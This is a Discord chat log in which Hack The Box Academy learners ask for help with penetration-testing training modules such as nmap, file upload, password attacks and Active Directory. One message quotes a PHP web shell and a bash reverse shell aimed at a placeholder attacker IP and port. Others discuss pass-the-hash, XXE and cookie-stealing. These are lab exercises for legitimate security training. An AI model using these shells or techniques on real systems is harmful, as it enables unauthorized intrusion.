#modules

1 messages ยท Page 405 of 1

fathom pendant
#

Making assumptions is how you miss the obvious

steady pelican
#

Got it, still my question is. If I have disabled ping using -Pn why it is still sending ICMP packets

fathom pendant
#

It shouldn't be

#

But -A may enable things

#

It's why your disable flags go at the end

raw bear
#

Hey there I'm currently working on the Vuln Assesment Modules and Im getting kinda confused on the methodology presented in the module.

It doesn't reallly make sense to me to Evaluate the risks and anticipate the potential harm that our vuln scan could cause to the company's information system (step6) AFTER performing the scan (step 5)

#

am I missing something here ?

fathom pendant
grand gate
#

Just a small question related to the subscription: I'm planning to sub to the $8 student plan, so is it auto subscription ? or if I want I can do it manually each month?

grand gate
tranquil axle
#

just unsub righ after subbing

fathom pendant
#

^

grand gate
#

Hmm ok ๐Ÿ‘€

fathom pendant
#

Monthly sub is for day x -> day x month to month so apr1 -> may1 or whatever day -> whatever day

acoustic owl
#

But remember that once the subscription has expired, you will only be able to access the modules that have been completed completely.

raw bear
fathom pendant
raw bear
#

ok I thought It was a typo for "Check in "

fathom pendant
#

I did not mistype

#

U and e are very far apart

#

If i had mistyped, I'd just give up on life

raw bear
#

Fair enough

#

that would have been a pro gamer mistype tho

wide river
quiet trout
#

Hi all working the footprinting assesment lab:

https://academy.hackthebox.com/module/112/section/1078

and running into this error:

NSOCK ERROR [4.4240s] mksock_bind_addr(): Bind to 0.0.0.0:631 failed (IOD #4495): Address already in use (98)

ive ran into this a few times when doing BOXES and not academy but i finally delved into this and it looks like i should be able to bypass this using --source-port <x> but doing that, its still returning :631 as in use... (i specified 13373)

#

is there ab etter way to fix this wihtout killing whatever (cups) is on that port

#

$ nmap -sV -sA 10.129.156.28 -g53 -Pn my nmap initially had nothing to do with that port anyways so im a little stumped... i did target that port on the TARGET (--top-ports=1000) but not sure why its trying to do that on my host, particularly with -g specified

acoustic owl
quiet trout
#

yes i understand the error message but not how that relates to outbound scanning

acoustic owl
#

A port can only be used by one service at a time.

quiet trout
#

yeah uncertain why its using :631 locally but putting that aside for a moment, i used the --source-port option to specify a diff port anmd i still came up with the exact same error

#

im doinga test on a target ip, not my local ip btw in case thats unclear

#

but the default route 0.0.00. is specified and im uncertain whose ip that is tbh

acoustic owl
#

I don't know what exactly you are trying to do, but the error message says that you tried to start a service on port 631, but it is already in use on your machine

quiet trout
#

(pwnbox or target)

#

I'm trying to do a simple --top-ports nmap scan -sV on a target

#

for the footprinting assessment

#

i guess i need to tcpdump a nmap scan and see if its trying to use my local ports to connect to the target or something?

#

it has to be local something because i terminated the pwnbox, restarted it and the scan kicked right over

acoustic owl
#

Which version of nmap do you use?

quiet trout
#

nmap 7.94, on pwnbox

acoustic owl
quiet trout
#

slightly diff error message but im passed it for now, ill just have to investigate the packets its possible my CTRL+C interruption, it didnt like that

#

thanks for that though ill keep it in mind

acoustic owl
#

I just tried it on the PwnBox without any problems. Maybe you should restart the target and the PwnBox.

solar bloom
#

Getting Started Module> Knowlege Check> When I search for exploit I don't find anything on search sploit and other websites. Using MSFconsole and selecting what should be the right exploit, the check fails. Also, I see there is a manual way to do this, but the php code doesn't match anything we have learned. I feel like this makes it hard because I am by no means a web dev or a programmer. Even using swisskyrepo I wouldn't of gotten the reverse shell via php syntax right.

fathom pendant
#

If the check fails: are you sure it's the right exploit

solar bloom
#

I just want to understand and learning what I'm actually doing is all :).

fathom pendant
#

Then you take notes and research

#

Htb can't break everything down all the time. You may require external resources to understand things

#

The php syntax just uses system() to run a system command

#

So instead of using php, it runs system code

solar bloom
#

I have a OneNote pretty full of each module and have been reading on php, I just don't get how some of the commands are created for this. I do understand external resources are required here but half the battle is understanding what to look for when you are learning what it IS.

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
vs
||<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'"); ?>||

fathom pendant
#

typically it's either $_REQUEST[] or $_GET[]

#

it takes the arguments from the url ?somvar=someval

#

in this case it takes the "cmd" argument and runs the input from that as a system() command

fathom pendant
#

then google from there

fathom pendant
#

so it's running a revshell command within the php syntax

#

PWNIP/PWNPO is your tun0 ip and your listening port; i can see you pulled that from the walkthrough/guide

solar bloom
#

Is there an easy way to scroll up in a terminal to see items we can no longer look at (above)? I did end up with root flag after using msfconsole.

brave prawn
#

Hey, can I dm someone on Introduction to Sliver C2 module? Can't manage to establish reverse shell via forwarded port

quick goblet
#

Hi, has anyone completed the Prompt Injection Attacks module?

In the final Skills Assessment, I managed to get the CEO banned and even obtained the admin key, but the flag still isnโ€™t showing. Am I missing something or doing it incorrectly?

coral crest
winter field
#

Anyone that completed the DACL attacks 2 module? I am stuck on the last question of the skills assessment.

quiet trout
#

We're talking about nmap -sV outputs or just returning the wrong nmap version (-v or whatever?)

astral egret
#

can any one help with password attacks- PTT for linux the last 2 questions.

#

i got the ticket right but it still gives me errors i cant access julios smb share

#

gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
it give me this

#

even though im using the right ticket
klist
Ticket cache: FILE:/root/krb5cc_647401106_HRJDux
Default principal: julio@INLANEFREIGHT.HTB

Valid starting Expires Service principal
10/07/2022 11:32:01 10/07/2022 21:32:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:32:01

#

โš ๏ธ help

north frigate
#

Hmm, could I get a hint for the DNS-module of "footholding"? ๐Ÿ™‚ The last question ("Find FQDN of host with IP xxx.xxx.xxx.203") ... so I'm running dnsenum with various wordlists on the ip adress of the initial dns-server (I do not know how to embed the information about the internal dns server in this query). Any help? ๐Ÿ˜„

brave prawn
stone elk
#

Is there any way to fix academy VPN constantly not working? I don't really know if that's my problem, but every like 3mins the IP of the server just keeps not responding and I can't do anything because of it.

#

I changed the server and the issue appears to be fixed

astral egret
#

waisted days thinking i was the problem the VPN is the fucking problem

#

fuck this shit man

gray yacht
astral egret
#

can anyone help where do i get LINUX01$ kerbos ticket from i dont really understand the question

fathom pendant
#

LINUX01$ would be the machine ticket that connects it to the AD environment

runic turret
#

Hi guys! I'm doing the Getting started module, i solved the first question and now i'm into user2 but whatever i do i can't find a way to escalate my privileges to access the flag.txt in /root, everything i try i can't move because i don't have the user2 password. The only hint i have is "don't forget to chmod" but i don't understand exactly how can i use it in this case. Sorry for the possible dumb question but i'm trying to learn as much as possible without googling solutions or using AIs

fathom pendant
#

sometimes a user may have more permissions to see something than they should

runic turret
#

I can reach the flag.txt inside root but i can't open it due to permissions and i can't find a way to escalate privileges

fathom pendant
#

every ssh user has one including root

#

just gotta list all items

vast wind
#

Hey everyone! Iโ€™m stuck in Getting Started on Public Exploits. I viewed the hint and searched exploits in meta soloist and found an read only exploit that lets to an etc/passwd but what am I supposed to do with the etc/passwd?

fathom pendant
#

options is useful

vast wind
#

Ah I knew it! okay

runic turret
astral egret
fathom pendant
#

any machine tickets will have the $ at the end

#

so; you need to find the config for how it connects to the realm

#

hint a tool they showcase will be useful

astral egret
#

thanyou homie

winter field
runic turret
runic turret
cloud urchin
#

so it either died or you have the pwnbox spawned at the same time being on the vpn or something. if your command is timing out that indicates you can't reach the target.

runic turret
cloud urchin
runic turret
#

I'm on VPN, ok i'll try one last time for today then i go to sleep lol thanks ๐Ÿ˜

flat estuary
#

I am experiencing a delay in the recursive ffuf scan process. I have double-checked the full URL from HTB academy on the browser, but it is showing "Server Not Found." Can someone help me with this?

flat estuary
#

from my vmware

cloud urchin
#

according to the text on the page you provided it's admin.academy.htb. in your command you're just using admin.academy. in discord you say you're using academy.htb. they are all different and according to the text, you need to use admin.academy.htb. make sure to add it to your /etc/hosts file too.

runic turret
cloud urchin
#

You can terminate the target, download a fresh VPN file, maybe from another server/region, hard refresh the site with CTRL+R, then re-spawn the target and try to connect again.

#

you should be able to ping the target too.

runic turret
vast wind
#

Hello all I am stuck again on Getting Started on Public Exploits. I couldnโ€™t get shadow so I got config but I am not sure what to do with the config. I tried logging in but it wonโ€™t allow me because of the access is denied for local host

silk lagoon
#

Can any kind soul please DM me regadring help with Skills Assessment - File Upload Attacks

vast wind
fathom pendant
silk lagoon
crimson obsidian
#

Quick question! Could i use my Education Email Adress as my secondary email on my HTB account and still have access to Education pricing for the monthly subscription?

fathom pendant
#

yes

crimson obsidian
shell ridge
#

Hello guys i have a question, i don't know if that's the right channel or what but the main question is:
How accurate is linpeas.sh?

I'm really new and I get linpeas red and yellow over a cve but when i try to check it there is a module required for that vulnerability to be exploited, it's missing on the machine.

Does this happens or maybe i'm doing something wrong? FeelsBadMan

fathom pendant
#

but i don't recommend using it for n00bs

#

it throws a lot of info at you that ultimately is useless unless you really know how to exploit it

lusty thicket
fierce stream
#

Hey, I've put in a lot of time this past year into leveling up my pentesting skills. I've completed Offsec's PEN-100, and PEN-200 course. Along with Hack the Box Academy's Information Security Foundations course, both Bug Bounty Hunting and Penetration Testing job roles.

I'm currently hitting a wall. I feel like my note taking, enumeration, and understanding of fundamentals are solid. But when tackling labs or networks with multiple machines, I'm struggling to differentiate between the correct path forward, and rabbit holes.

A lot of times during enumeration, I'll find things that look like valid attack paths, sometimes even real vulnerabilities, but they turn out to be dead ends. When that happens, I end up brute forcing every interactive part of the site just to make sure I didn't overlook something. That approach eventually reveals the path forward, but it's inefficient, and slow. My pace is no where near where it should be in recognizing where to focus my efforts.

I guess my question is, would someone be willing to tell me what I'm missing or what I should be focusing on to improve?

coral crest
shadow hollow
#

Hi Guys im preparing for CPTS and i am stuck in the attacking enterprise networks web part. Especially the cookie stealing on the support site. I can get requests to my php or pthon server if i just type the url to my server in the field that it needs to be in. But i cannot get a script to execute there. I already checked the solution tbh, bc i am stuck there for hours and cant figure it out at all. As a last resort i literally copied the solution and changed ip and port to my systems but it still doesnt work. AnyHelp would greatly be appreciated.
I also restarted everything, VPN, Lab, VM, Host. I cant figure out if i overlook something completely, the lab may be faulty or i am just on it for too long

fathom pendant
#

if you're struggling with that then you're likely doing something wrong

#

hard to say without knowing. but i'm an advocate of doing that module blind ==> not reading the module nor reading the questions

cyan laurel
#

Hello everyone,

Iโ€™m completely new to IT, but Iโ€™d like to learn about cybersecurity. I have a vocational diploma in digital systems, so Iโ€™m already familiar with basic concepts and feel comfortable with computers in general. However, I have no experience in cybersecurity and donโ€™t really know where to start.

If anyone has a recommended learning path (courses, certifications, resources, hands-on projects, etc.), Iโ€™d love to hear your advice! My goal is to learn gradually and in a practical way.

Thanks in advance for your help!

compact patrolBOT
pine dune
#

Hi guys, quick question. I have port 5621 open via nc and Im trying to redirect a vulnerable ssrf part of a website to that port however it's not giving the correct response but when I do it on port 80, it does. Anyone have any ideas why?

ocean night
#

@pine dune which module is that regarding?

pine dune
#

SSRF

ocean night
#

Provide a link to it, please

pine dune
#

they show it in the example with port 8000

#

Im trying to replicate it with port 5621 but idk if im doing somehting wrong

ocean night
#

That's a tier 2 module, so please avoid posting screenshots with potential spoilers

pine dune
#

sorry

ocean night
#

You've asked your quesiton, and specified the module, so hopefully someone will be open to giving you a nudge

#

๐Ÿ™‚

pine dune
#

okay thanks man ๐Ÿ™‚

acoustic owl
#

If you still need help, send me a dm

#

@pine dune ^

pine dune
serene drum
#

So I am currently on the File Upload Attacks module doing the absent Validation sub-module and I am having trouble understanding what I am doing wrong when writing the PHP script. I have tried a few different ways to output the hostname, but I dont get words, I get- nvm

#

LMAO I figured it out as I typed

#

Is there a channel I can suggest that a mistake was made on a certain question?

acoustic owl
safe mango
#

I don't know who created the assembly module on hack the box academy but that dude needs a raise.

serene drum
#

Hello, so I am currently on the client-side Validation sub module in the file upload attacks module. I am attempting to modify the request as it states to create a shell on the host.
I have tried doing it as it shows a few times on the backend, but I just either get what looks like encrypted characters, or a black screen if I remove those characters from the initial request. Any help would be appreciated.

fathom pendant
#

client-side section only requires you to modify the client-side validation side in the html from what i recall

serene drum
#

Yes, which I change the file name and add in the php script in the actual request. when I try to then visit the file, rather than presenting a shell it presents a blank page.

#

I havent tried the other way which is front end

fathom pendant
#

is the php shell expecting a request?

#

like ?c=<command>

serene drum
#

May I show you the image in the module I am using as reference?

fathom pendant
#

if the php code contains $_REQUEST["c"] => your call to the server must use ?c=

serene drum
#

Ohh

fathom pendant
#

$_REQUEST["param"] or $_GET["param"] require the "param" to be used in the request

serene drum
#

so if the "param" after $_REQUEST IS "cmd" I need to use cmd?

#

I'm a little confused

lusty thicket
#

it has to exist somewhere in the request

calm swan
#

Hi,
I have this small question regarding one command in Footprinting - DNS module.
I don't really understand the concept of using ns in a dig command as shown below:
dig ns inlanefreight.htb @10.129.14.128

What does it change to the output of a dig here?

serene drum
#

Is it okay if I post an image from the module so I can clarify.? From the way it seems to suggest, I change the file name in the request to theFileName.php and then a few lines down also write my script, and the send it, then try to visit it.

fathom pendant
#

module is above tier 0 so careful sharing :))

serene drum
#

yeah when I visit it, its just blank or if I dont remove the random characters, those characters are in it.

fathom pendant
#

it just being blank
^

#

that means it uploaded and you can visit it

#

given your php shell you need to call that endpoint with ?cmd=<command here>

serene drum
#

but when I visit it, its blank

#

ohhhh

#

I understand

lusty thicket
fathom pendant
#

if you want it to run an arbitrary command you'd instead replace $_REQUEST["cmd"] with whatever system command you want

fathom pendant
serene drum
#

you saying endpoint made it click I think

#

lets see

fathom pendant
#

dig <query> domain @nameserver

calm swan
fathom pendant
#

i'm sure there may be multiple ways to use dig

#

however the conventional format that dig uses is dig query do.main @name.server

calm swan
#

oh okay, thanks for the clarification

#

NGL but the amount of information in CPTS modules is just enormous

serene drum
fathom pendant
#

you don't include the <>

serene drum
#

I know

#

I didnt

fathom pendant
#

but yes it should; if it's not i'm assuming you did something wrong

#

:P

serene drum
#

Yeah I'm at a loss. haha

fathom pendant
serene drum
#

Okay.

serene drum
waxen totem
serene drum
#

Yeah I am looking into it. I wonder why the lesson says to use $_REQUEST

fathom pendant
#

this module is a decent showcase of the example != what you'll encounter

serene drum
#

Very true

calm swan
#

I got a problem in Footprinting - SMTP module with the last question;
I found the username but it says it's incorrect...
[+] 10.129.54.51:25 - 10.129.54.51:25 Users found: *****

#

I used metasploit to get it

#

question:
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

#

it is some task bug or?

waxen totem
calm swan
calm swan
waxen totem
#

also make sure you're using the wordlist from the resources

calm swan
#

yea, im using it

#

@waxen totem found it...

#

gonna write down this command for future; sometimes I love that Academy doesn't give all commands straight up, forcing us to research it ourselves and LEARN but sometimes it makes me maaaad haha

#

btw MS works too but I had to change the wordlist to the one provided in resources (and its kinda faster than the command I used)

silk lagoon
#

Hi can anyone give me a hint on File Upload Assesment.

I already have the extension and content type and found the directory from xxe attack to get from source code.

When uploading the final shell code it still says Only images allowed and i changed everything in repeater even added Magic bytes (GIF8)

#

I did also see in forums of someone using a hex editor and that as well did not work

calm swan
#

you can try adding double extension but I may be wrong (havent done this task yet)

silk lagoon
#

i did that as well

#

i checked (fuzzed) for both black and white listed as well for content type filters.

calm swan
#

if it says "Only images allowed" then its most likely that ur file has to have the image extension but I dont want to give the wrong idea cuz like I said I havent done that task yet

#

but keep researching, you'll find something useful in no time!

silk lagoon
#

I have been all day lol

#

earlier i couldnt find the source code but i took a break and i found it doing the same method idk how now it worked.

but now i cant get pass this issue.

#

As for hex editor i used a JPEG signature, but i guess the PHP code that follows immediately after, the system may detect it as suspicious. But i am not sure if this is even the issue.

safe star
#

have you tried using a real image

silk lagoon
#

i just used exiftool

#

on repeater it gives me a response and does not say "only images allowed" but when i go to the file it says only images are allowed again.

halcyon tinsel
#

i need to scan my system for all listening services across all inferfaces, im having trouble and chatgpt cant save me

cloud urchin
#

which module and section?

foggy solstice
#

Hey
I have never used hack the box
Can anyone tell me if THM and HTB are same or different??

silk lagoon
#

I got it to work but now stuck on parameter commands. I tried ?cmd= cat ../../../../flag.txt as well as cat flag.txt. Also cd ../../../../;ls -la but didnโ€™t see anything interesting

Any tips/hints?

this is still for Skills Assessment - File Upload Attacks

verbal parcel
#

is Skills Assessment - File Upload Attacks broken? I can upload a .svg file with the XXE payload for upload.php but it wont show anything in the source code

silk lagoon
#

Dm what payload you used bc it was like that for me too

verbal parcel
#

will do, ty

halcyon tinsel
waxen totem
# halcyon tinsel sysctl or netstat?

sysctl is responsible for the services on the machine
netstat is used to get the network status, usually ports and interfaces on the machine

which one do you think you should use? ๐Ÿ‘€

#

also provide the section name not just the number

halcyon tinsel
#

๐Ÿ˜ญ

#

its section "filtr contents"

waxen totem
halcyon tinsel
#

yh, ss -tuln | grep -c 'LISTEN' is responding 20, i thought -tuln would respond with all innerfaces

waxen totem
#

it wants the ones that AREN'T localhost

halcyon tinsel
#

ohh

waxen totem
#

~~ngl could've been worded better kek ~~

halcyon tinsel
#

thanks man

#

yh wording confused tf outtam e

#

ipv6 too or just ipv4?

spiral sapphire
#

Hey guys! I just want to confirm one thing. I'm doing the web attack module and for the remote code execution with XXE exercise I'm supposed to launch a python web server on my VM. I just want to confirm is it safe to do so? Can a malicious actor connect to my VM or home network if I do "sudo python3 -m http.server 80" ? Are there any risks or totally safe?

waxen totem
halcyon tinsel
#

okkk

real delta
waxen totem
spiral sapphire
#

Okay, thanks guys! That is good to know. I was worried the port 80 will open up for everyone on the internet and everyone and their mom will try to connect to my IP through port 80. ๐Ÿ˜„

waxen totem
#

massive security boost ngl

halcyon tinsel
grand gate
#

One more small question
If say, I pay my $8 and then unsub, will my subscription be valid for that month?

#

For the htb academy student plan

halcyon tinsel
waxen totem
grand gate
#

I want to explore and see first if I'm comfortable with the content then I'll continue with the sub

real delta
grand gate
#

And if I can handle ctps I could go ahead with that then

real delta
compact patrolBOT
grand gate
#

ok

halcyon tinsel
#

"Need to speak to a person?" ai is too powerful

real delta
#

AI isn't very smart

halcyon tinsel
grand gate
#

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions
I wonder if this article is still valid

Scrolling down, you can see your current plan. At the end of the page, you can simply click the Cancel Subscription option, which will keep your current month's or year's subscription active and running, but will prevent further automatic payments from going out from your default registered payment method.

halcyon tinsel
#

yh so it should cancel after free trial,

#

otherwise you can always tell your card not to give em mony

waxen totem
#

~~and don't say T0 modules are free trials, they aren't kek ~~

grand gate
#

ok, and if I cancel the sub then it should be valid for the next 30 days right ?

real delta
grand gate
#

ok

halcyon tinsel
waxen totem
halcyon tinsel
#

kk can i dm u?

waxen totem
#

what for?

halcyon tinsel
#

future problems etc etc. also i might have one now..

#

1s

waxen totem
halcyon tinsel
#

same question, however i didnt know if i could post possible answers here?

waxen totem
#

you can post command results without the answers in it

grand gate
#

ah F support is closed till tomorrow

#

I want to know if someone tried to cancel the subscription right after paying

spiral sapphire
#

Why couldn't you? You've paid for the whole month, yeah? Also, if you want to be sure. Why don't you just cancel the subscription a day before the month has passed?

grand gate
#

oh right I can also do that

fierce mortar
#

Hello can someone help me , i'm in wordpress skill assements on hacthebox academy , i can't launch a wpscan ?

real delta
fierce mortar
#

And i can't access the httos servers i have this error "SSL_ERROR_RX_RECORD_TOO_LONG"

grand gate
#

nice, decided to enroll in student plan, will complete the pen tester path first ๐Ÿ˜…
decided to let it go on for 3 odd months then unsub

halcyon tinsel
waxen totem
native crow
#

Hey guys , super sttuck on AD Enumeration & Attacks - Skills Assessment Part II. Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host. I've Obtained the C*** users PW and generic all rights. But cannot abuse ACL / Admin hash obtained from SQL01 doesnt work with MS01. Would much appreciate some help

heady tusk
fast jungle
#

Hello. I'm having trouble with the new android fundamentals module. Section android emulators, question Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? I have created the correct AVD but it seems like the build number is incorrect.

red steppe
#

Hey all, I would like to ask
for AD Trust Attacks Module
Lesson (Unconstrained Delegation)

Currently i am attempting to spin uip the box. However everytime I authenticate I would reciveve the error 'ERRCONNECTLOGON_FAILURE

#

If anyone has ever done this module and would love to point me on to the right direction would be greately appreciated ๐Ÿ™‚

#

Disregard this issue, it seems like it was vpn related. I chaged vpn and sorta worked

full wagon
#

๐Ÿ‘

limber wedge
#

sorry not related to modules, more to AttackBox VM, not sure if its the right place to ask, but anyone have this issue? i dont have any active AttackBox VM at the moment

sand ember
#

Hi,
I'm currently doing the module "Applications of AI in InfoSec"

For the Network Anomaly Detection, when I'm submitting the model file for evaluation, I got the error "Invalid model file"

I validated the upload code by uploading the spam classifier (to the right port), and it works

I also tried to load the Network anomaly model and use it, it also works, so the joblib.dump() seems ok

Did I miss something?

regal sigil
#

How do I fix this output in a windows shell

rustic sage
#

Hello

compact patrolBOT
fathom pendant
#

@limber wedge ^

fathom pendant
fallow kernel
#

In the Linux Local Privilege Escalation - Skills Assessment module there is a note that says:

Note: There is a way to obtain a shell on the box instead of using the SSH credentials if you would like to make the scenario more challenging. This is optional and does not award more points or count towards completion.

Is there someone who figured out how to get a foothold without using SSH?

limber wedge
runic turret
#

Hi guys, i'm doing the pentest introduction course, i'm on the Nibble machine and i'm following instructions but when i try to execute the whatweb <ip/nibbleblog> i get the ReadTimeout error. I googled and there's another guy that had the same problem and he supposed that it was due to Nibbles beeing part of the vip subscription, is this the reason? It's not a problem by my side

#

If i execute whatweb with IP only it works, the problem is when i try to access /nibbleblog and i can't reach it on the browser too

calm swan
#

@fathom pendant you never sleep, right? hahah

fathom pendant
#

try changing vpn regions/respawning target

runic turret
#

I also tried to click directly on the link from the redirectLocation of the whatweb scan so the url should be correct, I'll try your suggestion and let it know, thank you!

#

It's weird because the initial page where there's the Hello World string works

alpine ingot
#

on the logrotate part of linux privesc, why is the log not rotating?

calm swan
#

its in the Footprinting - SNMP module last question

fathom pendant
#

that's not how snmpwalk works

calm swan
#

then I thought I can use snmpget to get the content of it

fathom pendant
#

lol also: you are grepping and it is returning what you're grepping maybe you need more Context After the grep

#

grep is a powerful tool if you just read the docs

fathom pendant
fathom pendant
alpine ingot
#

oh lol nvm, immediately after sendin that i got root. then the shell went away before i could cat the flag.

fathom pendant
calm swan
#

thanks A LOT!!!

alpine ingot
#

I got flag, thank you! I dont remember reading anything about how to update the log in the section.

fathom pendant
south marsh
#

Who here likes powershell ?

calm swan
#

who doesn't LOL

south marsh
#

I was being ironic, we actually support that?

#

I guess we have too

alpine ingot
#

I hate learning powershell but oh boy do i like what you can do with it.

fresh wedge
#

so i am on Password attack lab-hard. Was able to get the hashes from the vhd file. but none of the wordlist i have tried so far cracked Administrator hash. Can i get a hint in the right direction please

fathom pendant
fresh wedge
#

โ””โ”€โ”€โ•ผ $john hashes_to_crack.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt found nothing

fathom pendant
#

if not: you don't need a password to log into windows, sometimes the hash is all you need

alpine ingot
bitter needle
alpine ingot
#

yeah its weird, i was doing a box once and i was stumped after not being able to crack the hash, eventually i looked up the next step in the walkthrough and was so annoyed that i just had to use the hash.

regal sigil
bitter needle
fathom pendant
bitter needle
alpine ingot
#

uhhhhh, idk. I remember one of the more recent active directory ones i did was cicada but idk for sure if that was it.

fathom pendant
#

with Windows: the hash is the same as the password, essentially

bitter needle
fathom pendant
#

it's not that their password is the hash, it's just the way the login works

fathom pendant
#

the hash is just a hashed version of the pw

bitter needle
#

u mean if i put hash it is treated as a password itslef in windows?

#

like rather than password123 if i input the hash of it , windows treat it the same way? @fathom pendant

#

I havent really touched windows machines yet, been mostly working on Linux.

fresh wedge
#

ok so i tried to use the CMD as Administrator and tried the hash as the passwd that didnt work. so we must have to import psexec on the box to get this to work or something

alpine ingot
#

so im doing the misc linux priv esc and i ended up getting root with the nfs but i cant find the flag. I found 4 flags on the system and none are the right ones

fathom pendant
fallow kernel
fathom pendant
alpine ingot
fathom pendant
#

an ntlm hash is in the format LM:NT, typically the NT portion is used

#

for UAC, you'd need the pw

#

but you can just... log in as the admin directly

#

instead of dealing with UAC/importing tools

bitter needle
fathom pendant
barren kite
fathom pendant
#

basically how any password authentication should work is that the password itself isn't stored, rather the hash

bitter needle
#

is this a common practice while doing ctf or real life pentesting

fathom pendant
#

yes

#

lol

#

not niche at all

bitter needle
#

ohhhh
wow

barren kite
#

SUPER common lol

bitter needle
#

๐Ÿ˜ข

#

but thanks a lot for the valuable info u guys shared

#

i learned a lot bcz of this convo

fathom pendant
#

it's passed off differently with PTH techniques

bitter needle
fathom pendant
#

basically the way the PTH code works is it skips the password hashing part and says "hey look at this and compare"

bitter needle
fathom pendant
#

you don't use PTH for standard login

bitter needle
#

got it

fathom pendant
#

not sure what you mean "safer"

#

you use your password all the time to log in

#

an attacker would use the hash because the authentication mechanism allows for it

fresh wedge
bitter needle
#

ok understood,
safer was in terms as PTH bypasses the usual pass hashing was it inherently less secure

#

but i understand now

#

it doesnt make it less secure

#

thanks ๐Ÿ’ฏ

bitter needle
#

and while searching up on google, i found psexec needs SMB enabled

#

maybe try wmiexec

barren kite
#

or try using evil winrm

lapis sky
#

I need help with mssql attacks, i need resources, what happened in attack common services hard lab is abusing

rustic sage
#

Your daily take care message

Hello everyone I hope you have an amazing day today staying safe, drinking water, staying hydrated, eat a snack, take a shower n take your meds if you need to.

And remember that someone is happy that you exist and Iโ€™m so proud of you all. Stay amazing yโ€™all, take breaks when needed and take care of yourself first. Love yโ€™all and stay awesome

cyan arch
#

Hi, I'm doing the backup and restore page within linux fundamentals and it is asking me for the htb user password, what is this for default?

#

Okay nevermind, I changed the command because I am just copying files to a backup on the same system just to test the command. I am still curious as to the default password for the htb user for future use?

lapis sky
fathom pendant
#

@fresh wedge please avoid sharing things like hashes

#

:)

signal hound
#

Hello im trying to use kerbrute to get some valid users
But kerbrute gets stuck when using jsmith.txt
But is doing well when using a small list
How can i resolve this?

#

And why it happens?

compact halo
#

Hello, i am having an issue with a module. I wanted to check here first before i hit up support. Is anyone avialable?

lusty thicket
compact halo
#

Thank you! On AS-REPRoasting Challenge questions (Kerberos Attacks) It says to login with a specific user and pass. Each time I try to log in it ives me a bad user/pass. I've tried with local and domain user once i go to the login screen. Just curious if i am missing something here

compact halo
#

Never mind. After the 3rd reset it finally worked

cloud urchin
compact halo
storm elk
#

You deserve a raise Nuts

#

Or a few more nuts

fallow kernel
# lapis sky ?

What do you mean? What you need to do is in the Atacking SQL Databases module from Attacking Common Services right?

lapis sky
fallow kernel
#

Yeah what is the problem?

lapis sky
#

i wanted to know the technique exactly in the conclusion what are you trying to do, it was impersonating users via mssql right?

fallow kernel
#

Yes

lapis sky
#

damn, the technique is really cool but was real pain

#

took me a lot of time

fallow kernel
#

Yeah the sqlcmd program is a bit goofy

stiff bone
#

The SPN Jacking module had problems getting the NTLM hash of the user in the context of which I should abuse access in the last task. I used different techniques, but the module clearly gave a hint that I should use the Shadow Credentials technique. I used the Whisker tool from Linux and Windows, but I get the same problem [X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP.

quiet trout
cloud urchin
quiet trout
#

im going back over my notes and the associated module but not seeing anything in particular

cloud urchin
#

sure

quiet trout
safe star
#

Cd

quiet trout
#

i tried sudo cd and it gave me some error i didnt note at the time let me try it again

#

i also mounted it in ~/nfs

#

should i have mounted it in /mnt/nfs or similar?

safe star
#

Nah

#

Is it the nobody group?

quiet trout
#

yes funnily enough sudo ls ~/nfs is showing files

#

let me try the cd again its possible i ... mispelled? it?

#

unlikely but lets see

safe star
#

switch to root

quiet trout
#

is that gonna be sudo -l in this instance?

#

er sudo -i? or whatever it is?

#

or su root?

#

i never know when to use what

safe star
#

su root, sudo su

quiet trout
#

oh gosh

#

So whats going on here? is nobody and nogroup actual users/groups and thats causing the conflict?

#

i thought those were globs for whatever for anonymous?

safe star
#

I think it has something to do with root squash but not 100% sure

quiet trout
#

thanks that was lost on me

polar bolt
#

๐Ÿ‘‹ Last night I completed Starting Point. This morning I spun up OpenVPN Initialization Sequence Completed and I cannot ping the server, I get request timeout. I tried Pwnbox and I'm getting the same thing. I've tried restarting my computer. I've tried using both my wifi and tethering to my phone. I'm not sure what else I should be checking here.

compact halo
polar bolt
#

I've tried 3 different targets now.

#

Looks like I can't upload screenshots here.

https://app.hackthebox.com/machines/Cap
Displays Target IP Address 10.10.10.245
OpenVPN displays Initialization Sequence Completed
and pinging gives

ping 10.10.10.245
PING 10.10.10.245 (10.10.10.245): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
^C```
safe star
#

Is that a starting point machine?

#

Starting point and the other machines have different vpns

polar bolt
#

I feel like I'm experiencing multiple issues ๐Ÿ˜“

I clicked on the Machines tab on the left sidebar and chose the UnderPass challenge. I also got VPN credentials for Machines from the top rigth corner and I started UnderPass and I'm still getting timeouts.

safe star
#

Try sudo killall openvpn and try again

#

Ip route also to check

polar bolt
#

Whelp now at least I can connect via the Virtual Machine. Still can't get OpenVPN to work.

compact halo
#

On your VM what's your NIC set to?

polar bolt
#

Some combination of things, including sudo killall openvpn caused it to work ๐Ÿ™ƒ

compact halo
#

Bridged, Auto, etc? Not sure which platform you are using

#

ok, my bad. I had that issue once with Fusion

polar bolt
#

That was a fun learning opportunity. Yall are awesome, thanks for all the help.

#

Your answer answers the question "How would you text align an H1 element"

#

To match the format of the question, I'm guessing the answer is text-align: left

storm elk
#

The format was there in the question ๐Ÿ˜…

acoustic owl
polar bolt
thin cradle
#

Hello @acoustic owl Where do I get help from HTB staff regarding HTB academy modules question. Im stuck at this one for hours

acoustic owl
thin cradle
#

Im doing question 1 of DACL II skills assessment. I have set up chisel just like the solution pointed but when i run finddelegation its just timing out.

wide crater
#

Hello, im pretty new to pentesting and did the web requests module, but i got stuck at crud api, there is one exercise, but i dont seem to understand, its this one: Exercise: Try adding a new city through the browser devtools, by using one of the Fetch POST requests you used in the previous section.

rustic sage
#

